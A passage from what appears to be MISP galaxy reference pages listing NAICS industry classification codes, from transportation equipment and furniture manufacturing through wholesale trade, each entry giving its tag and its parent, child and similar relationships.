The tag is: misp-galaxy:naics="335999"

335999 has relationships with:

  • child-of: misp-galaxy:naics="3359" with estimative-language:likelihood-probability="likely"

336

Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="336"

336 has relationships with:

  • parent-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3365" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

3361

Motor Vehicle Manufacturing

The tag is: misp-galaxy:naics="3361"

3361 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336120" with estimative-language:likelihood-probability="likely"

33611

Automobile and Light Duty Motor Vehicle Manufacturing

The tag is: misp-galaxy:naics="33611"

33611 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336110" with estimative-language:likelihood-probability="likely"

336110

Automobile and Light Duty Motor Vehicle Manufacturing

The tag is: misp-galaxy:naics="336110"

336110 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33611" with estimative-language:likelihood-probability="likely"

33612

Heavy Duty Truck Manufacturing

The tag is: misp-galaxy:naics="33612"

33612 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336120" with estimative-language:likelihood-probability="likely"

336120

Heavy Duty Truck Manufacturing

The tag is: misp-galaxy:naics="336120"

336120 has relationships with:

  • child-of: misp-galaxy:naics="3361" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33612" with estimative-language:likelihood-probability="likely"

3362

Motor Vehicle Body and Trailer Manufacturing

The tag is: misp-galaxy:naics="3362"

3362 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336214" with estimative-language:likelihood-probability="likely"

33621

Motor Vehicle Body and Trailer Manufacturing

The tag is: misp-galaxy:naics="33621"

33621 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336211

Motor Vehicle Body Manufacturing

The tag is: misp-galaxy:naics="336211"

336211 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336212

Truck Trailer Manufacturing

The tag is: misp-galaxy:naics="336212"

336212 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336213

Motor Home Manufacturing

The tag is: misp-galaxy:naics="336213"

336213 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

336214

Travel Trailer and Camper Manufacturing

The tag is: misp-galaxy:naics="336214"

336214 has relationships with:

  • child-of: misp-galaxy:naics="3362" with estimative-language:likelihood-probability="likely"

3363

Motor Vehicle Parts Manufacturing

The tag is: misp-galaxy:naics="3363"

3363 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33631" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33632" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33633" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33634" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33635" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336350" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33636" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336360" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33637" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336370" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33639" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336390" with estimative-language:likelihood-probability="likely"

33631

Motor Vehicle Gasoline Engine and Engine Parts Manufacturing

The tag is: misp-galaxy:naics="33631"

33631 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336310" with estimative-language:likelihood-probability="likely"

336310

Motor Vehicle Gasoline Engine and Engine Parts Manufacturing

The tag is: misp-galaxy:naics="336310"

336310 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33631" with estimative-language:likelihood-probability="likely"

33632

Motor Vehicle Electrical and Electronic Equipment Manufacturing

The tag is: misp-galaxy:naics="33632"

33632 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336320" with estimative-language:likelihood-probability="likely"

336320

Motor Vehicle Electrical and Electronic Equipment Manufacturing

The tag is: misp-galaxy:naics="336320"

336320 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33632" with estimative-language:likelihood-probability="likely"

33633

Motor Vehicle Steering and Suspension Components (except Spring) Manufacturing

The tag is: misp-galaxy:naics="33633"

33633 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336330" with estimative-language:likelihood-probability="likely"

336330

Motor Vehicle Steering and Suspension Components (except Spring) Manufacturing

The tag is: misp-galaxy:naics="336330"

336330 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33633" with estimative-language:likelihood-probability="likely"

33634

Motor Vehicle Brake System Manufacturing

The tag is: misp-galaxy:naics="33634"

33634 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336340" with estimative-language:likelihood-probability="likely"

336340

Motor Vehicle Brake System Manufacturing

The tag is: misp-galaxy:naics="336340"

336340 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33634" with estimative-language:likelihood-probability="likely"

33635

Motor Vehicle Transmission and Power Train Parts Manufacturing

The tag is: misp-galaxy:naics="33635"

33635 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336350" with estimative-language:likelihood-probability="likely"

336350

Motor Vehicle Transmission and Power Train Parts Manufacturing

The tag is: misp-galaxy:naics="336350"

336350 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33635" with estimative-language:likelihood-probability="likely"

33636

Motor Vehicle Seating and Interior Trim Manufacturing

The tag is: misp-galaxy:naics="33636"

33636 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336360" with estimative-language:likelihood-probability="likely"

336360

Motor Vehicle Seating and Interior Trim Manufacturing

The tag is: misp-galaxy:naics="336360"

336360 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33636" with estimative-language:likelihood-probability="likely"

33637

Motor Vehicle Metal Stamping

The tag is: misp-galaxy:naics="33637"

33637 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336370" with estimative-language:likelihood-probability="likely"

336370

Motor Vehicle Metal Stamping

The tag is: misp-galaxy:naics="336370"

336370 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33637" with estimative-language:likelihood-probability="likely"

33639

Other Motor Vehicle Parts Manufacturing

The tag is: misp-galaxy:naics="33639"

33639 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336390" with estimative-language:likelihood-probability="likely"

336390

Other Motor Vehicle Parts Manufacturing

The tag is: misp-galaxy:naics="336390"

336390 has relationships with:

  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33639" with estimative-language:likelihood-probability="likely"

3364

Aerospace Product and Parts Manufacturing

The tag is: misp-galaxy:naics="3364"

3364 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33641" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336415" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336419" with estimative-language:likelihood-probability="likely"

33641

Aerospace Product and Parts Manufacturing

The tag is: misp-galaxy:naics="33641"

33641 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336411

Aircraft Manufacturing

The tag is: misp-galaxy:naics="336411"

336411 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336412

Aircraft Engine and Engine Parts Manufacturing

The tag is: misp-galaxy:naics="336412"

336412 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336413

Other Aircraft Parts and Auxiliary Equipment Manufacturing

The tag is: misp-galaxy:naics="336413"

336413 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336414

Guided Missile and Space Vehicle Manufacturing

The tag is: misp-galaxy:naics="336414"

336414 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336415

Guided Missile and Space Vehicle Propulsion Unit and Propulsion Unit Parts Manufacturing

The tag is: misp-galaxy:naics="336415"

336415 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336419

Other Guided Missile and Space Vehicle Parts and Auxiliary Equipment Manufacturing

The tag is: misp-galaxy:naics="336419"

336419 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

3365

Railroad Rolling Stock Manufacturing

The tag is: misp-galaxy:naics="3365"

3365 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33651" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336510" with estimative-language:likelihood-probability="likely"

33651

Railroad Rolling Stock Manufacturing

The tag is: misp-galaxy:naics="33651"

33651 has relationships with:

  • child-of: misp-galaxy:naics="3365" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336510" with estimative-language:likelihood-probability="likely"

336510

Railroad Rolling Stock Manufacturing

The tag is: misp-galaxy:naics="336510"

336510 has relationships with:

  • child-of: misp-galaxy:naics="3365" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33651" with estimative-language:likelihood-probability="likely"

3366

Ship and Boat Building

The tag is: misp-galaxy:naics="3366"

3366 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33661" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336612" with estimative-language:likelihood-probability="likely"

33661

Ship and Boat Building

The tag is: misp-galaxy:naics="33661"

33661 has relationships with:

  • child-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

336611

Ship Building and Repairing

The tag is: misp-galaxy:naics="336611"

336611 has relationships with:

  • child-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

336612

Boat Building

The tag is: misp-galaxy:naics="336612"

336612 has relationships with:

  • child-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

3369

Other Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="3369"

3369 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33699" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336999" with estimative-language:likelihood-probability="likely"

33699

Other Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="33699"

33699 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

336991

Motorcycle, Bicycle, and Parts Manufacturing

The tag is: misp-galaxy:naics="336991"

336991 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

336992

Military Armored Vehicle, Tank, and Tank Component Manufacturing

The tag is: misp-galaxy:naics="336992"

336992 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

336999

All Other Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="336999"

336999 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

337

Furniture and Related Product Manufacturing

The tag is: misp-galaxy:naics="337"

337 has relationships with:

  • parent-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

3371

Household and Institutional Furniture and Kitchen Cabinet Manufacturing

The tag is: misp-galaxy:naics="3371"

3371 has relationships with:

  • child-of: misp-galaxy:naics="337" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337126" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337127" with estimative-language:likelihood-probability="likely"

33711

Wood Kitchen Cabinet and Countertop Manufacturing

The tag is: misp-galaxy:naics="33711"

33711 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="337110" with estimative-language:likelihood-probability="likely"

337110

Wood Kitchen Cabinet and Countertop Manufacturing

The tag is: misp-galaxy:naics="337110"

337110 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33711" with estimative-language:likelihood-probability="likely"

33712

Household and Institutional Furniture Manufacturing

The tag is: misp-galaxy:naics="33712"

33712 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337121

Upholstered Household Furniture Manufacturing

The tag is: misp-galaxy:naics="337121"

337121 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337122

Nonupholstered Wood Household Furniture Manufacturing

The tag is: misp-galaxy:naics="337122"

337122 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337126

Household Furniture (except Wood and Upholstered) Manufacturing

The tag is: misp-galaxy:naics="337126"

337126 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337127

Institutional Furniture Manufacturing

The tag is: misp-galaxy:naics="337127"

337127 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

3372

Office Furniture (including Fixtures) Manufacturing

The tag is: misp-galaxy:naics="3372"

3372 has relationships with:

  • child-of: misp-galaxy:naics="337" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337215" with estimative-language:likelihood-probability="likely"

33721

Office Furniture (including Fixtures) Manufacturing

The tag is: misp-galaxy:naics="33721"

33721 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337211

Wood Office Furniture Manufacturing

The tag is: misp-galaxy:naics="337211"

337211 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337212

Custom Architectural Woodwork and Millwork Manufacturing

The tag is: misp-galaxy:naics="337212"

337212 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337214

Office Furniture (except Wood) Manufacturing

The tag is: misp-galaxy:naics="337214"

337214 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337215

Showcase, Partition, Shelving, and Locker Manufacturing

The tag is: misp-galaxy:naics="337215"

337215 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

3379

Other Furniture Related Product Manufacturing

The tag is: misp-galaxy:naics="3379"

3379 has relationships with:

  • child-of: misp-galaxy:naics="337" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33791" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33792" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337920" with estimative-language:likelihood-probability="likely"

33791

Mattress Manufacturing

The tag is: misp-galaxy:naics="33791"

33791 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="337910" with estimative-language:likelihood-probability="likely"

337910

Mattress Manufacturing

The tag is: misp-galaxy:naics="337910"

337910 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33791" with estimative-language:likelihood-probability="likely"

33792

Blind and Shade Manufacturing

The tag is: misp-galaxy:naics="33792"

33792 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="337920" with estimative-language:likelihood-probability="likely"

337920

Blind and Shade Manufacturing

The tag is: misp-galaxy:naics="337920"

337920 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33792" with estimative-language:likelihood-probability="likely"

339

Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="339"

339 has relationships with:

  • parent-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

3391

Medical Equipment and Supplies Manufacturing

The tag is: misp-galaxy:naics="3391"

3391 has relationships with:

  • child-of: misp-galaxy:naics="339" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339116" with estimative-language:likelihood-probability="likely"

33911

Medical Equipment and Supplies Manufacturing

The tag is: misp-galaxy:naics="33911"

33911 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339112

Surgical and Medical Instrument Manufacturing

The tag is: misp-galaxy:naics="339112"

339112 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339113

Surgical Appliance and Supplies Manufacturing

The tag is: misp-galaxy:naics="339113"

339113 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339114

Dental Equipment and Supplies Manufacturing

The tag is: misp-galaxy:naics="339114"

339114 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339115

Ophthalmic Goods Manufacturing

The tag is: misp-galaxy:naics="339115"

339115 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339116

Dental Laboratories

The tag is: misp-galaxy:naics="339116"

339116 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

3399

Other Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="3399"

3399 has relationships with:

  • child-of: misp-galaxy:naics="339" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33995" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339950" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33999" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339995" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339999" with estimative-language:likelihood-probability="likely"

33991

Jewelry and Silverware Manufacturing

The tag is: misp-galaxy:naics="33991"

33991 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339910" with estimative-language:likelihood-probability="likely"

339910

Jewelry and Silverware Manufacturing

The tag is: misp-galaxy:naics="339910"

339910 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33991" with estimative-language:likelihood-probability="likely"

33992

Sporting and Athletic Goods Manufacturing

The tag is: misp-galaxy:naics="33992"

33992 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339920" with estimative-language:likelihood-probability="likely"

339920

Sporting and Athletic Goods Manufacturing

The tag is: misp-galaxy:naics="339920"

339920 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33992" with estimative-language:likelihood-probability="likely"

33993

Doll, Toy, and Game Manufacturing

The tag is: misp-galaxy:naics="33993"

33993 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339930" with estimative-language:likelihood-probability="likely"

339930

Doll, Toy, and Game Manufacturing

The tag is: misp-galaxy:naics="339930"

339930 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33993" with estimative-language:likelihood-probability="likely"

33994

Office Supplies (except Paper) Manufacturing

The tag is: misp-galaxy:naics="33994"

33994 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339940" with estimative-language:likelihood-probability="likely"

339940

Office Supplies (except Paper) Manufacturing

The tag is: misp-galaxy:naics="339940"

339940 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33994" with estimative-language:likelihood-probability="likely"

33995

Sign Manufacturing

The tag is: misp-galaxy:naics="33995"

33995 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339950" with estimative-language:likelihood-probability="likely"

339950

Sign Manufacturing

The tag is: misp-galaxy:naics="339950"

339950 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33995" with estimative-language:likelihood-probability="likely"

33999

All Other Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="33999"

33999 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339991

Gasket, Packing, and Sealing Device Manufacturing

The tag is: misp-galaxy:naics="339991"

339991 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339992

Musical Instrument Manufacturing

The tag is: misp-galaxy:naics="339992"

339992 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339993

Fastener, Button, Needle, and Pin Manufacturing

The tag is: misp-galaxy:naics="339993"

339993 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339994

Broom, Brush, and Mop Manufacturing

The tag is: misp-galaxy:naics="339994"

339994 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339995

Burial Casket Manufacturing

The tag is: misp-galaxy:naics="339995"

339995 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339999

All Other Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="339999"

339999 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

42

Wholesale Trade

The tag is: misp-galaxy:naics="42"

42 has relationships with:

  • parent-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="425" with estimative-language:likelihood-probability="likely"

423

Merchant Wholesalers, Durable Goods

The tag is: misp-galaxy:naics="423"

423 has relationships with:

  • child-of: misp-galaxy:naics="42" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

4231

Motor Vehicle and Motor Vehicle Parts and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4231"

4231 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423140" with estimative-language:likelihood-probability="likely"

42311

Automobile and Other Motor Vehicle Merchant Wholesalers

The tag is: misp-galaxy:naics="42311"

42311 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423110" with estimative-language:likelihood-probability="likely"

423110

Automobile and Other Motor Vehicle Merchant Wholesalers

The tag is: misp-galaxy:naics="423110"

423110 has relationships with:

